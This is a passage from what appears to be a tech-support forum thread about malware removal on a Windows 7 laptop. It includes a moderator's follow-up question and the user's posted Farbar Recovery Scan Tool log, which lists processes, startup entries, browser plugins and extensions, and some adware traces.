Total Pagefile: 7785.9 MB
Available Pagefile: 5300.35 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.46 GB) (Free:145.46 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 466 GB) (Disk ID: 1D505CB8)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=103 MB) - (Type=0C)

==================== End Of Log ============================
  • 0

#8
Essexboy

Essexboy

    GeekU Moderator

  • GeekU Moderator
  • 62,615 posts
Could you post the main FRST log as well..

Did AVG install OK and what are the current problems
  • 0

#9
bigredyeeha

bigredyeeha

    Member

  • Member
  • PipPip
  • 33 posts
Yes AVG installed. No, It is responding better.

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-12-2013 01
Ran by Jon Lowry (administrator) on WOLFLING on 10-12-2013 19:07:27
Running from C:\Users\Jon Lowry\Downloads
Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 10
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(Aventail Corporation) C:\Windows\System32\ngvpnmgr.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(Apple Inc.) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe
(Alcatel-Lucent) C:\Program Files (x86)\Common Files\Motive\McciCMService.exe
(Alcatel-Lucent) C:\Program Files\Common Files\Motive\McciCMService.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\VS7DEBUG\MDM.EXE
(Malwarebytes Corporation) C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamgui.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Dropbox, Inc.) C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office\Office15\ONENOTEM.EXE
() C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgidsagent.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgwdsvc.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgnsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgemca.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgrsa.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgui.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2014\avgcsrva.exe

==================== Registry (Whitelisted) ==================

HKLM\...\Run: [SynTPEnh] - C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] - C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6486120 2011-02-22] (Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe [500208 2010-03-06] (Adobe Systems Incorporated)
HKLM\...\Run: [HotKeysCmds] - C:\Windows\system32\hkcmd.exe [ ] ()
HKLM\...\Run: [Logitech Download Assistant] - C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2013-11-27] (Hewlett-Packard)
HKLM-x32\...\Runonce: [AvgUninstallURL] - cmd.exe /c start http://www.avg.com/w...&"ver=10.0.1427 [x]
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKCU\...\Run: [Facebook Update] - C:\Users\Jon Lowry\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2012-08-10] (Facebook Inc.)
HKLM-x32\...\Run: [IAStorIcon] - C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [Microsoft Default Manager] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [Norton Online Backup] - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [SwitchBoard] - C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS5ServiceManager] - C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe [406992 2010-02-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [DivXUpdate] - C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [1230704 2011-03-21] ()
HKLM-x32\...\Run: [CloneCDTray] - C:\Program Files (x86)\SlySoft\CloneCD\CloneCDTray.exe [57344 2009-01-29] (SlySoft, Inc.)
HKLM-x32\...\Run: [HP Quick Launch] - C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [577408 2012-02-15] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [Adobe ARM] - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [843712 2012-01-03] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HP Software Update] - C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe [54576 2009-11-18] (Hewlett-Packard)
HKLM-x32\...\Run: [SunJavaUpdateSched] - C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [AVG_UI] - C:\Program Files (x86)\AVG\AVG2014\avgui.exe [4956176 2013-11-07] (AVG Technologies CZ, s.r.o.)
HKU\Administrator.WOLFLING\...\Run: [HPAdvisorDock] - C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe [1712184 2010-02-09] ()
HKU\Default\...\Run: [HPAdvisorDock] - C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe [1712184 2010-02-09] ()
HKU\Default User\...\Run: [HPAdvisorDock] - C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe [1712184 2010-02-09] ()
HKU\Mcx1-WOLFLING\...\Winlogon: [Shell] C:\Windows\eHome\McrMgr.exe [343552 2009-07-13] (Microsoft Corporation) <==== ATTENTION
HKU\Mcx1-WOLFLING.WOLFLING\...\Winlogon: [Shell] C:\Windows\eHome\McrMgr.exe [343552 2009-07-13] (Microsoft Corporation) <==== ATTENTION
Startup: C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Jon Lowry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Jon Lowry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office\Office15\ONENOTEM.EXE (Microsoft Corporation)
BootExecute: ä* //www.bleepingcomputer.com/combofix/how-to-use-combofix~n~nnote: you may be infected with a file patching virus 'virut't'

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft...=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://myserp.net/?s...=hp&w=1&t=7&s=1
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKLM - DefaultScope value is missing.
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {4C6AB4BD-96D7-4335-97AB-C4588C2427C2} URL = http://en.wikipedia....h={searchTerms}
SearchScopes: HKLM - {4FDD993D-F656-4134-8E18-AFCCC84F8912} URL = http://search.yahoo....psg&type=HPNTDF
SearchScopes: HKCU - {4C6AB4BD-96D7-4335-97AB-C4588C2427C2} URL =
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear
BHO: avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
BHO: Lync Browser Helper - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Lync Browser Helper - {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} - C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll (Microsoft Corporation)
BHO-x32: DivX Plus Web Player HTML5 <video> - {326E768D-4182-46FD-9C16-1449A49795F4} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO-x32: DivX HiQ - {593DDEC6-7468-4cdd-90E1-42DADAA222E9} - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
BHO-x32: Java™ Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper - {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} - C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - avast! Online Security - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
Toolbar: HKLM-x32 - avast! Online Security - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office\Office15\MSOSB.DLL (Microsoft Corporation)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Winsock: Catalog5 01 C:\Windows\SysWOW64\mswsock.dll [231424] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Winsock: Catalog5-x64 01 %SystemRoot%\System32\mswsock.dll [327168] (Microsoft Corporation) ATTENTION: The LibraryPath should be "%SystemRoot%\system32\NLAapi.dll"
Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12

FireFox:
========
FF ProfilePath: C:\Users\Jon Lowry\AppData\Roaming\Mozilla\Firefox\Profiles\8mzbhq3r.default
FF NewTab: hxxp://myserp.net/?source=nt&w=49408&t=4&s=1
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_152.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~1\MICROS~2\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer - C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/Lync,version=15.0 - C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - c:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~3\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @real.com/nppl3260;version=6.0.12.450 - C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpjplug;version=6.0.12.448 - C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll (RealNetworks, Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @Skype Limited.com/Facebook Video Calling Plugin - C:\Users\Jon Lowry\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
FF Plugin HKCU: @unity3d.com/UnityPlayer,version=1.0 - C:\Users\Jon Lowry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\scenicreflectionstb.xml
FF HKLM\...\Firefox\Extensions: [{C4CFC0DE-134F-4466-B2A2-FF7C59A8BFAD}] - C:\Program Files\Updater By SweetPacks\Firefox
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension\
FF Extension: Default Manager - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension\
FF HKLM-x32\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\html5video
FF Extension: DivX Plus Web Player HTML5 &lt;video&gt; - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\html5video
FF HKLM-x32\...\Firefox\Extensions: [{6904342A-8307-11DF-A508-4AE2DFD72085}] - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\wpa
FF Extension: DivX HiQ - C:\Program Files (x86)\DivX\DivX Plus Web Player\firefox\wpa
FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\PROGRA~1\AVASTS~1\Avast\WebRep\FF
FF Extension: avast! Online Security - C:\PROGRA~1\AVASTS~1\Avast\WebRep\FF

Chrome:
=======
CHR HomePage:
CHR RestoreOnStartup: "", "
CHR DefaultSearchKeyword: google.com
CHR DefaultSearchProvider: Google
CHR DefaultSearchURL: {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR DefaultNewTabURL: {google:baseURL}_/chrome/newtab?{google:RLZ}{google:instantExtendedEnabledParameter}{google:ntpIsThemedParameter}ie={inputEncoding}
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\31.0.1650.63\pdf.dll ()
CHR Plugin: (Microsoft\u00AE Windows Media Player Firefox Plugin) - C:\Users\Jon Lowry\AppData\Roaming\Mozilla\plugins\np-mswmp.dll (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (AVG SiteSafety plugin) - C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\15.5.0\\npsitesafety.dll No File
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (DivX Web Player) - C:\Program Files (x86)\DivX\DivX Plus Web Player\npdivx32.dll (DivX, LLC)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.153\npGoogleUpdate3.dll No File
CHR Plugin: (Java™ Platform SE 7 U25) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Pando Web Plugin) - C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll No File
CHR Plugin: (RealPlayer™ G2 LiveConnect-Enabled Plug-In (32-bit) ) - C:\Program Files (x86)\Real Alternative\browser\plugins\nppl3260.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer Version Plugin) - C:\Program Files (x86)\Real Alternative\browser\plugins\nprpjplug.dll (RealNetworks, Inc.)
CHR Plugin: (Windows Live\u0099 Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (Unity Player) - C:\Users\Jon Lowry\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
CHR Plugin: (Facebook Video Calling Plugin) - C:\Users\Jon Lowry\AppData\Local\Facebook\Video\Skype\npFacebookVideoCalling.dll (Skype Limited)
CHR Plugin: (Shockwave for Director) - C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll (Adobe Systems, Inc.)
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_8_800_168.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.250.17) - C:\Windows\SysWOW64\npDeployJava1.dll No File
CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\5.1.20513.0\npctrl.dll No File
CHR Extension: (Google Drive) - C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0
CHR Extension: (YouTube) - C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0
CHR Extension: (Google Search) - C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0
CHR Extension: (avast! Online Security) - C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki\9.0.2005.45_0
CHR Extension: (Google Wallet) - C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0
CHR Extension: (Gmail) - C:\Users\Jon Lowry\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0
CHR HKLM-x32\...\Chrome\Extension: [dfkfeemgjcjcednnaoemnjdiakmjbbbh] - C:\ProgramData\ADDICT-THING\dfkfeemgjcjcednnaoemnjdiakmjbbbh.crx
CHR HKLM-x32\...\Chrome\Extension: [dnmlhhbehhdmajijfenoldcajelckpmn] - C:\Users\Jon Lowry\AppData\Local\CRE\dnmlhhbehhdmajijfenoldcajelckpmn.crx
CHR HKLM-x32\...\Chrome\Extension: [fnjbmmemklcjgepojigaapkoodmkgbae] - C:\Program Files (x86)\DivX\DivX Plus Web Player\google_chrome\wpa\wpa.crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\PROGRA~1\AVASTS~1\Avast\WebRep\Chrome\aswWebRepChrome.crx
CHR HKLM-x32\...\Chrome\Extension: [kepfgejmidkmoiimkfdjocdjhbcpmlmg] - C:\Users\Jon Lowry\AppData\Local\CRE\kepfgejmidkmoiimkfdjocdjhbcpmlmg.crx
CHR HKLM-x32\...\Chrome\Extension: [klibnahbojhkanfgaglnlalfkgpcppfi] - C:\Users\Jon Lowry\AppData\Local\CRE\klibnahbojhkanfgaglnlalfkgpcppfi.crx
CHR HKLM-x32\...\Chrome\Extension: [nemfjadlboooiffmcelkafilagddogim] - C:\Users\Jon Lowry\AppData\Local\CRE\nemfjadlboooiffmcelkafilagddogim.crx
CHR HKLM-x32\...\Chrome\Extension: [njljkdinboobkmkihgcohanchjnjpgjk] - C:\Users\Jon Lowry\AppData\Local\CRE\njljkdinboobkmkihgcohanchjnjpgjk.crx
CHR HKLM-x32\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - C:\Program Files (x86)\DivX\DivX Plus Web Player\google_chrome\html5video\html5video.crx
CHR HKLM-x32\...\Chrome\Extension: [npffmjkglbnioaoncpfmdbmehnbcldfh] - C:\Program Files (x86)\LyricSing\130.crx

==================== Services (Whitelisted) =================

R2 Akamai; c:\program files (x86)\common files\akamai/netsession_win_8fa3539.dll [4569856 2013-07-01] (Akamai Technologies, Inc.)
